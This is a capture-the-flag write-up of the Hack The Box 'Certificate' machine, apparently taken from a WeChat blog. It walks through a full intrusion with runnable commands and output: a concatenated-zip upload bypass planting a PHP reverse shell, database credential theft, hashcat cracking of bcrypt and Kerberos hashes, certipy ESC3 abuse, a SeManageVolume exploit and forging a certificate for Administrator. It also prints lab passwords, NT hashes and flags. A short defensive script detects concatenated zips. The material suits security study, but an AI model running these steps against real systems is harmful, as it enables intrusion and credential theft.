Information gathering
nmap
Port scanning
➜ Certificate nmap --min-rate 10000 -A -p- 10.10.11.71
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-09 20:49 CST
Nmap scan report for 10.10.11.71
Host is up (0.30s latency).
Not shown: 65519 filtered tcp ports (no-response)
PORT      STATE SERVICE    VERSION
53/tcp    open  domain     (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  tcpwrapped
|_http-title: Did not follow redirect to http://certificate.htb/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
88/tcp    open  tcpwrapped
135/tcp   open  tcpwrapped
139/tcp   open  tcpwrapped
445/tcp   open  tcpwrapped
593/tcp   open  tcpwrapped
636/tcp   open  tcpwrapped
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
|_ssl-date: 2025-06-09T20:29:06+00:00; +7h38m17s from scanner time.
3268/tcp  open  tcpwrapped
3269/tcp  open  tcpwrapped
|_ssl-date: 2025-06-09T20:29:03+00:00; +7h38m18s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
9389/tcp  open  tcpwrapped
49667/tcp open  tcpwrapped
49692/tcp open  tcpwrapped
49693/tcp open  tcpwrapped
49712/tcp open  tcpwrapped
49718/tcp open  tcpwrapped
dirsearch
Directory enumeration
➜ Certificate dirsearch -u http://certificate.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/yefeng/桌面/HTB/Certificate/reports/http_certificate.htb/__25-06-10_21-25-58.txt

Target: http://certificate.htb/

[21:25:58] Starting: 
[21:26:02] 403 -  304B - /%C0%AE%C0%AE%C0%AF
[21:26:02] 403 -  304B - /%3f/
[21:26:02] 403 -  304B - /%ff
[21:26:08] 403 -  304B - /.ht_wsr.txt
[21:26:08] 403 -  304B - /.htaccess.bak1
[21:26:08] 403 -  304B - /.htaccess.orig
[21:26:08] 403 -  304B - /.htaccess.save
[21:26:08] 403 -  304B - /.htaccess.sample
[21:26:08] 403 -  304B - /.htaccess_sc
[21:26:08] 403 -  304B - /.htaccess_orig
[21:26:08] 403 -  304B - /.htaccessOLD
[21:26:08] 403 -  304B - /.htaccess_extra
[21:26:08] 403 -  304B - /.htaccessBAK
[21:26:08] 403 -  304B - /.htaccessOLD2
[21:26:08] 403 -  304B - /.htm
[21:26:08] 403 -  304B - /.html
[21:26:08] 403 -  304B - /.htpasswd_test
[21:26:08] 403 -  304B - /.httr-oauth
[21:26:08] 403 -  304B - /.htpasswds
[21:26:24] 200 -   14KB - /about.php
[21:26:49] 403 -  304B - /cgi-bin/
[21:26:49] 500 -  638B - /cgi-bin/printenv.pl
[21:26:56] 200 -    0B - /db.php
[21:27:02] 503 -  404B - /examples
[21:27:02] 503 -  404B - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[21:27:02] 503 -  404B - /examples/
[21:27:02] 503 -  404B - /examples/servlets/servlet/CookieExample
[21:27:02] 503 -  404B - /examples/jsp/snp/snoop.jsp
[21:27:02] 503 -  404B - /examples/servlets/servlet/RequestHeaderExample
[21:27:02] 503 -  404B - /examples/servlets/index.html
[21:27:02] 503 -  404B - /examples/jsp/index.html
[21:27:02] 503 -  404B - /examples/servlet/SnoopServlet
[21:27:02] 503 -  404B - /examples/websocket/index.xhtml
[21:27:04] 200 -    3KB - /footer.php
[21:27:07] 200 -    2KB - /header.php
[21:27:10] 403 -  304B - /index.php::$DATA
[21:27:15] 200 -    9KB - /login.php
[21:27:16] 302 -    0B - /logout.php  ->  login.php
[21:27:28] 403 -  423B - /phpmyadmin
[21:27:30] 403 -  423B - /phpmyadmin/
[21:27:30] 403 -  423B - /phpmyadmin/docs/html/index.html
[21:27:30] 403 -  423B - /phpmyadmin/ChangeLog
[21:27:30] 403 -  423B - /phpmyadmin/phpmyadmin/index.php
[21:27:30] 403 -  423B - /phpmyadmin/doc/html/index.html
[21:27:30] 403 -  423B - /phpmyadmin/index.php
[21:27:30] 403 -  423B - /phpmyadmin/README
[21:27:30] 403 -  423B - /phpmyadmin/scripts/setup.php
[21:27:35] 200 -   11KB - /register.php
[21:27:37] 403 -  423B - /server-info
[21:27:37] 403 -  423B - /server-status/
[21:27:38] 403 -  423B - /server-status
[21:27:42] 301 -  343B - /static  ->  http://certificate.htb/static/
[21:27:42] 301 -  345B - /static..  ->  http://certificate.htb/static../
[21:27:50] 403 -  304B - /Trace.axd::$DATA
[21:27:51] 302 -    0B - /upload.php  ->  login.php
[21:27:56] 403 -  304B - /web.config::$DATA
[21:27:56] 403 -  304B - /webalizer
[21:27:56] 403 -  304B - /webalizer/
There is an upload.php page, but it cannot be accessed directly (it redirects to login.php). There are also register and login pages.
Register an account, log in, and look for functionality.
Port 80 - upload
At the bottom of the page you can see that the template/theme in use is Colorlib; one could try searching for known CVEs against it.
After registering and logging in, look for functionality. In the courses section there is an Enroll function; after clicking it, a Submit button appears below.
Clicking Submit redirects to http://certificate.htb/upload.php?s_id=5
where an assignment file can be submitted (uploaded).
According to the hint, only the following can be uploaded:
We accept only the following file types: .pdf .docx .pptx .xlsx. You include the assignment file in a .zip archive file to reduce its size
Tried uploading a PHP file directly; it was rejected.
Learned something new here:
"This isn't an archive, it's a trap: beware of the Evasive Concatenated Zip attack"
https://github.com/snyk/zip-slip-vulnerability
https://perception-point.io/blog/evasive-concatenated-zip-trojan-targets-windows-users/
Following the links above, generate the zip file.
➜ Certificate ls
reports  reverse  test.pdf
➜ Certificate ls -al reverse    # the reverse directory holds the reverse-shell script
总计 12
drwxrwxr-x 2 yefeng yefeng 4096  6月10日 22:39 .
drwxrwxr-x 4 yefeng yefeng 4096  6月10日 22:40 ..
-rw-rw-r-- 1 yefeng yefeng 2585  6月10日 22:38 reverse.php
➜ Certificate zip test.zip test.pdf    # build a harmless zip containing any ordinary file
  adding: test.pdf (deflated 98%)
➜ Certificate zip -r shell.zip reverse    # zip the directory that holds the script
  adding: reverse/ (stored 0%)
  adding: reverse/reverse.php (deflated 60%)
➜ Certificate cat test.zip shell.zip > final.zip    # concatenate the harmless zip and the malicious zip, in that order, into the final archive
➜ Certificate ls
final.zip  reports  reverse  shell.zip  test.pdf  test.zip
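As an added defensive example (my code, not from the original article or from the linked projects), the Python script below checks whether a zip file is really one archive: it parses the end-of-central-directory record that extractors honour and compares the entries it lists against every local file header present in the raw bytes. It builds a constructed in-memory stand-in for the test.zip + shell.zip concatenation above, with inert placeholder contents instead of any payload. Which half of a concatenated archive a given tool shows varies; the disagreement between the two views is the signal an upload handler can reject on.

```python
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"  # end-of-central-directory record
CD_SIG = b"PK\x01\x02"    # central-directory file header
LFH_SIG = b"PK\x03\x04"   # local file header


def find_all(data: bytes, sig: bytes) -> list:
    """Every offset at which the 4-byte signature occurs in the raw bytes."""
    hits, pos = [], data.find(sig)
    while pos != -1:
        hits.append(pos)
        pos = data.find(sig, pos + 1)
    return hits


def analyze_zip(data: bytes) -> dict:
    """Compare what the final EOCD record advertises with what the raw bytes hold.
    Extractors honour the last EOCD, so a second EOCD, bytes ahead of the advertised
    archive, or local headers the directory never lists mean this is not one plain
    archive (zip64 and chance signature matches in compressed data are not handled)."""
    eocds = find_all(data, EOCD_SIG)
    if not eocds:
        raise ValueError("no end-of-central-directory record")
    last = eocds[-1]
    entries, cd_size, cd_offset = struct.unpack_from("<HII", data, last + 10)
    archive_start = last - cd_size - cd_offset  # 0 for a normal archive
    if archive_start < 0:
        raise ValueError("central directory offset points outside the file")

    listed, pos = [], archive_start + cd_offset
    for _ in range(entries):
        if data[pos:pos + 4] != CD_SIG:
            raise ValueError("corrupt central directory")
        nlen, xlen, clen = struct.unpack_from("<HHH", data, pos + 28)
        listed.append(data[pos + 46:pos + 46 + nlen].decode("utf-8", "replace"))
        pos += 46 + nlen + xlen + clen

    raw = []
    for off in find_all(data, LFH_SIG):
        nlen = struct.unpack_from("<H", data, off + 26)[0]
        raw.append(data[off + 30:off + 30 + nlen].decode("utf-8", "replace"))
    unlisted = [name for name in raw if name not in listed]

    return {
        "eocd_records": len(eocds),
        "leading_bytes": archive_start,
        "listed": listed,
        "unlisted": unlisted,
        "suspicious": len(eocds) > 1 or archive_start > 0 or bool(unlisted),
    }


def make_zip(files: dict) -> bytes:
    """Build a small stored (uncompressed) zip in memory from {name: content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_concatenated_sample() -> bytes:
    """Constructed stand-in for `cat test.zip shell.zip > final.zip`; both members are inert placeholders."""
    harmless = make_zip({"test.pdf": b"%PDF-1.4\n% constructed placeholder\n"})
    second = make_zip({"reverse/reverse.php": b"<?php /* constructed placeholder, no payload */ ?>\n"})
    return harmless + second
```

For the constructed sample, `analyze_zip` reports two EOCD records, a non-zero leading-byte count and `test.pdf` as an entry the honoured directory never lists, while a plain single archive reports none of these.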
Upload the final archive; the upload succeeds and a "here" link appears.
It points to the path below. Browse to the files according to the structure we just zipped, while listening for the reverse shell.
http://certificate.htb/static/uploads/7af21a959d787f761b08dac295577bdd/test.pdf
http://certificate.htb/static/uploads/7af21a959d787f761b08dac295577bdd/reverse/reverse.php
shell -> Sara.b -> information
Looking around for information, db.php turns up (it was also found by the dirsearch scan earlier). Reading it reveals the database username and password.
PS C:\xampp\htdocs\certificate.htb> ls

    Directory: C:\xampp\htdocs\certificate.htb

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        12/26/2024   1:49 AM                static
-a----        12/24/2024  12:45 AM           7179 about.php
-a----        12/30/2024   1:50 PM          17197 blog.php
-a----        12/30/2024   2:02 PM           6560 contacts.php
-a----        12/24/2024   6:10 AM          15381 course-details.php
-a----        12/24/2024  12:53 AM           4632 courses.php
-a----        12/23/2024   4:46 AM            549 db.php
-a----        12/22/2024  10:07 AM           1647 feature-area-2.php
-a----        12/22/2024  10:22 AM           1331 feature-area.php
-a----        12/22/2024  10:16 AM           2955 footer.php
-a----        12/23/2024   5:13 AM           2351 header.php
-a----        12/24/2024  12:52 AM           9497 index.php
-a----        12/25/2024   1:34 PM           5908 login.php
-a----        12/23/2024   5:14 AM            153 logout.php
-a----        12/24/2024   1:27 AM           5321 popular-courses-area.php
-a----        12/25/2024   1:27 PM           8240 register.php
-a----        12/28/2024  11:26 PM          10366 upload.php

PS C:\xampp\htdocs\certificate.htb> type db.php
<?php
// Database connection using PDO
try {
    $dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
    $db_user = 'certificate_webapp_user'; // Change to your DB username
    $db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password
    $options = [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ];
    $pdo = new PDO($dsn, $db_user, $db_passwd, $options);
} catch (PDOException $e) {
    die('Database connection failed: ' . $e->getMessage());
}
?>
Now to connect to the database: the xampp directory (XAMPP is a free, open-source web stack) contains mysql.exe.
Use the -e option to run a query and print the result in the terminal, and -E to display each row vertically so the output is easy to read.
PS C:\xampp\mysql\bin> .\mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -e "use certificate_webapp_db; select * from users;" -E
*************************** 1. row ***************************
        id: 1
first_name: Lorra
 last_name: Armessa
  username: Lorra.AAA
     email: [email protected]
  password: $2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG
created_at: 2024-12-23 12:43:10
      role: teacher
 is_active: 1
*************************** 2. row ***************************
        id: 6
first_name: Sara
 last_name: Laracrof
  username: Sara1200
     email: [email protected]
  password: $2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK
created_at: 2024-12-23 12:47:11
      role: teacher
 is_active: 1
*************************** 3. row ***************************
        id: 7
first_name: John
 last_name: Wood
  username: Johney
     email: [email protected]
  password: $2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq
created_at: 2024-12-23 13:18:18
      role: student
 is_active: 1
*************************** 4. row ***************************
        id: 8
first_name: Havok
 last_name: Watterson
  username: havokww
     email: [email protected]
  password: $2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti
created_at: 2024-12-24 09:08:04
      role: teacher
 is_active: 1
*************************** 5. row ***************************
        id: 9
first_name: Steven
 last_name: Roman
  username: stev
     email: [email protected]
  password: $2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2
created_at: 2024-12-24 12:05:05
      role: student
 is_active: 1
*************************** 6. row ***************************
        id: 10
first_name: Sara
 last_name: Brawn
  username: sara.b
     email: [email protected]
  password: $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6
created_at: 2024-12-25 21:31:26
      role: admin
 is_active: 1
*************************** 7. row ***************************
        id: 12
first_name: a
 last_name: a
  username: test
     email: [email protected]
  password: $2y$04$vwe.PPbSkbpE8PUUlTlXUu33rl7SNaDQrbZSomfpknEXtOgxeilly
created_at: 2025-06-12 13:16:01
      role: student
 is_active: 1
*************************** 8. row ***************************
        id: 13
first_name: Kali
 last_name: Kalki
  username: Kali
     email: [email protected]
  password: $2y$04$hfaMKHRnCcSRI04qiWK1auFkdDFhMAaRlPDtH0WfgKZGouda5590K
created_at: 2025-06-12 13:18:13
      role: student
 is_active: 1
Check which local user accounts exist.
PS C:\Users> ls

    Directory: C:\Users

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        12/30/2024   8:33 PM                Administrator
d-----        11/23/2024   6:59 PM                akeder.kh
d-----         11/4/2024  12:55 AM                Lion.SK
d-r---         11/3/2024   1:05 AM                Public
d-----         11/3/2024   7:26 PM                Ryan.K
d-----        11/26/2024   4:12 PM                Sara.B
d-----        12/29/2024   5:30 PM                xamppuser
Sara.B has both a local profile and a row in the database, so try cracking her hash.
hashcat -> Sara.b
  username: sara.b
     email: [email protected]
  password: $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6

➜ Certificate hashcat -m 3200 -a 0 hash /usr/share/wordlists/rockyou.txt --show
$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6:Blink182

# verify the credential with crackmapexec
➜ Certificate crackmapexec winrm 10.10.11.71 -u sara.b -p 'Blink182'
SMB         10.10.11.71     5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certificate.htb)
HTTP        10.10.11.71     5985   DC01             [*] http://10.10.11.71:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.11.71     5985   DC01             [+] certificate.htb\sara.b:Blink182 (Pwn3d!)
Evil-winrm
Connect with evil-winrm.
➜ Certificate evil-winrm -i dc01.certificate.htb -u sara.b -p 'Blink182'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Sara.B\Documents> whoami
certificate\sara.b
After connecting there is no user.txt, so this account's privileges are not enough; we need to keep moving laterally and collecting information.
pcap capture file leak
The Documents folder is not empty: it contains a WS-01 directory, and inside it a pcap capture file.
*Evil-WinRM* PS C:\Users\Sara.B\Documents> ls

    Directory: C:\Users\Sara.B\Documents

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         11/4/2024  12:53 AM                WS-01

*Evil-WinRM* PS C:\Users\Sara.B\Documents> cd WS-01
*Evil-WinRM* PS C:\Users\Sara.B\Documents\WS-01> dir

    Directory: C:\Users\Sara.B\Documents\WS-01

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         11/4/2024  12:44 AM            530 Description.txt
-a----         11/4/2024  12:45 AM         296660 WS-01_PktMon.pcap

*Evil-WinRM* PS C:\Users\Sara.B\Documents\WS-01> download WS-01_PktMon.pcap .
Info: Downloading C:\Users\Sara.B\Documents\WS-01\WS-01_PktMon.pcap to WS-01_PktMon.pcap
Info: Download successful!
Open it in Wireshark and analyze it: the packets are SMB2 and KRB5 traffic, i.e. authentication exchanges.
Use this project to assemble the hash:
https://github.com/jalvarezz13/Krb5RoastParser
Here the .HTB suffix has to be added to the domain name manually.
➜ Krb5RoastParser git:(main) python krb5_roast_parser.py ../WS-01_PktMon.pcap as_req
$krb5pa$18$Lion.SK$CERTIFICATE$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0
$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0
hashcat -> Lion.SK
➜ Certificate hashcat -m 19900 -a 0 hash1 /usr/share/wordlists/rockyou.txt --show
$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0:!QAZ2wsx
shell -> Lion.SK -> user.txt
➜ Certificate evil-winrm -i 10.10.11.71 -u 'Lion.SK' -p '!QAZ2wsx'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Lion.SK\Documents> whoami
certificate\lion.sk
This user can read user.txt, which is on the Desktop.
MGQ5ZTU5ZmZmMTlkNWNhZWYwZjdmOGI3ZDRmMmVhZjU=
BloodHound
Collect domain information with bloodhound-python.
➜ Certificate bloodhound-python -u Lion.SK -p '!QAZ2wsx' -d certificate.htb -ns 10.10.11.71 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: certificate.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.certificate.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: dc01.certificate.htb
INFO: Found 19 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: WS-05.certificate.htb
INFO: Querying computer: WS-01.certificate.htb
INFO: Querying computer: DC01.certificate.htb
ERROR: Unhandled exception in computer DC01.certificate.htb processing: The NETBIOS connection with the remote host timed out.
INFO: Traceback (most recent call last):
.........................
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
INFO: Done in 00M 51S
INFO: Compressing output into 20250613080000_bloodhound.zip
Import the zip file into BloodHound.
Lion belongs to the DOMAIN CRA MANAGERS group, which is used to issue and revoke certificates.
Try working with this through certipy.
certipy
➜ Certificate certipy find -u lion.sk -p '!QAZ2wsx' -dc-ip 10.10.11.71
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 18 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'Certificate-LTD-CA' via RRP
[*] Successfully retrieved CA configuration for 'Certificate-LTD-CA'
[*] Checking web enrollment for CA 'Certificate-LTD-CA' @ 'DC01.certificate.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250613081134_Certipy.txt'
[*] Wrote text output to '20250613081134_Certipy.txt'
[*] Saving JSON output to '20250613081134_Certipy.json'
[*] Wrote JSON output to '20250613081134_Certipy.json'
ESC3 attack, but it failed here
The Ryan.k user belongs to DOMAIN STORAGE MANAGERS; the ESC3 attack can be carried out against this user.
# Request a certificate based on the Delegated-CRA template to obtain an intermediate certificate. The attacker expects the Delegated-CRA template to be flawed, so that the lion.sk user (possibly low-privileged) can obtain a certificate with special capabilities (in particular, the ability to act as an "enrollment agent").
certipy req -u '[email protected]' -p "!QAZ2wsx" -dc-ip '10.10.11.71' -target 'DC01.CERTIFICATE.HTB' -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'
# Using the Delegated-CRA certificate, request a SignedUser template certificate on behalf of ryan.k
certipy req -u '[email protected]' -p "!QAZ2wsx" -dc-ip '10.10.11.71' -target 'DC01.CERTIFICATE.HTB' -ca 'Certificate-LTD-CA' -template 'SignedUser' -pfx 'lion.sk.pfx' -on-behalf-of 'CERTIFICATE\ryan.k'
# Authenticate with the ryan.k certificate just obtained
certipy auth -pfx 'ryan.k.pfx' -dc-ip '10.10.11.71'
➜ Certificate certipy req -u '[email protected]' -p "!QAZ2wsx" -dc-ip '10.10.11.71' -target 'DC01.CERTIFICATE.HTB' -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 21
[*] Successfully requested certificate
[*] Got certificate with UPN '[email protected]'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1115'
[*] Saving certificate and private key to 'lion.sk.pfx'
[*] Wrote certificate and private key to 'lion.sk.pfx'
➜ Certificate certipy req -u '[email protected]' -p "!QAZ2wsx" -dc-ip '10.10.11.71' -target 'DC01.CERTIFICATE.HTB' -ca 'Certificate-LTD-CA' -template 'SignedUser' -pfx 'lion.sk.pfx' -on-behalf-of 'CERTIFICATE\ryan.k'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 22
[*] Successfully requested certificate
[*] Got certificate with UPN '[email protected]'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1117'
[*] Saving certificate and private key to 'ryan.k.pfx'
[*] Wrote certificate and private key to 'ryan.k.pfx'
➜ Certificate certipy auth -pfx 'ryan.k.pfx' -dc-ip '10.10.11.71'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: '[email protected]'
[*]     Security Extension SID: 'S-1-5-21-515537669-4223687196-3249690583-1117'
[*] Using principal: '[email protected]'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ryan.k.ccache'
[*] Wrote credential cache to 'ryan.k.ccache'
[*] Trying to retrieve NT hash for 'ryan.k'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6
shell -> Ryan.k
➜ Certificate evil-winrm -i 10.10.11.71 -u 'Ryan.k' -H 'b1bc3d70e70f4f36b1509a65ae1a2ae6'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Ryan.K\Documents> whoami
certificate\ryan.k
Check the current user's privileges.
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                      State
============================= ================================ =======
SeMachineAccountPrivilege     Add workstations to domain       Enabled
SeChangeNotifyPrivilege       Bypass traverse checking         Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set   Enabled
The SeManageVolumePrivilege privilege ---> https://github.com/CsEnox/SeManageVolumeExploit
Upload the exe.
*Evil-WinRM* PS C:\Users\Ryan.K> upload /home/yefeng/桌面/HTB/Certificate/SeManageVolumeExploit.exe .

Info: Uploading /home/yefeng/桌面/HTB/Certificate/SeManageVolumeExploit.exe to C:\Users\Ryan.K\.

Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\Ryan.K> dir

    Directory: C:\Users\Ryan.K

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---         9/15/2018  12:12 AM                Desktop
d-r---         6/12/2025   5:33 PM                Documents
d-r---         9/15/2018  12:12 AM                Downloads
d-r---         9/15/2018  12:12 AM                Favorites
d-r---         9/15/2018  12:12 AM                Links
d-r---         9/15/2018  12:12 AM                Music
d-r---         9/15/2018  12:12 AM                Pictures
d-----         9/15/2018  12:12 AM                Saved Games
d-r---         9/15/2018  12:12 AM                Videos
-a----         6/12/2025   5:35 PM           3422 SeManageVolumeExploit.c
-a----         6/12/2025   5:37 PM          12288 SeManageVolumeExploit.exe

*Evil-WinRM* PS C:\Users\Ryan.K>
Certificate forgery
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> certutil -Store My
My "Personal"
================ Certificate 0 ================
Archived!
Serial Number: 472cb6148184a9894f6d4d2587b1b165
Issuer: CN=certificate-DC01-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:30 PM
 NotAfter: 11/3/2029 3:40 PM
Subject: CN=certificate-DC01-CA, DC=certificate, DC=htb
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Cert Hash(sha1): 82ad1e0c20a332c8d6adac3e5ea243204b85d3a7
  Key Container = certificate-DC01-CA
  Unique container name: 6f761f351ca79dc7b0ee6f07b40ae906_7989b711-2e3f-4107-9aae-fb8df2e3b958
  Provider = Microsoft Software Key Storage Provider
Signature test passed
================ Certificate 1 ================
Serial Number: 5800000002ca70ea4e42f218a6000000000002
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 8:14 PM
 NotAfter: 11/3/2025 8:14 PM
Subject: CN=DC01.certificate.htb
Certificate Template Name (Certificate Type): DomainController
Non-root Certificate
Template: DomainController, Domain Controller
Cert Hash(sha1): 779a97b1d8e492b5bafebc02338845ffdff76ad2
  Key Container = 46f11b4056ad38609b08d1dea6880023_7989b711-2e3f-4107-9aae-fb8df2e3b958
  Simple container name: te-DomainController-3ece1f1c-d299-4a4d-be95-efa688b7fee2
  Provider = Microsoft RSA SChannel Cryptographic Provider
Private key is NOT exportable
Encryption test passed
================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:55 PM
 NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
  Key Container = Certificate-LTD-CA
  Unique container name: 26b68cbdfcd6f5e467996e3f3810f3ca_7989b711-2e3f-4107-9aae-fb8df2e3b958
  Provider = Microsoft Software Key Storage Provider
Signature test passed
CertUtil: -store command completed successfully.

*Evil-WinRM* PS C:\temp> certutil -exportPFX My 75b2f4bbf31f108945147b466131bdca cert.pfx
# then
# download cert.pfx to the local machine
*Evil-WinRM* PS C:\temp> download cert.pfx .
certipy forge -ca-pfx cert.pfx -out golden_ticket.pfx -upn Administrator
certipy auth -pfx golden_ticket.pfx -dc-ip 10.10.11.71 -user Administrator -domain CERTIFICATE.HTB
Forging
➜ Certificate certipy forge -ca-pfx cert.pfx -out golden_ticket.pfx -upn Administrator
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Saving forged certificate and private key to 'golden_ticket.pfx'
[*] Wrote forged certificate and private key to 'golden_ticket.pfx'
➜ Certificate certipy auth -pfx golden_ticket.pfx -dc-ip 10.10.11.71 -user Administrator -domain CERTIFICATE.HTB
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'Administrator'
[*] Using principal: '[email protected]'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6
Evil-winrm -> administrator
NWUzMDBjNzY1YjJiNTJjNWFhYWU3OTY2YmUxOTQyYWU=
Originally published on the WeChat public account 夜风Sec: HTB - Certificate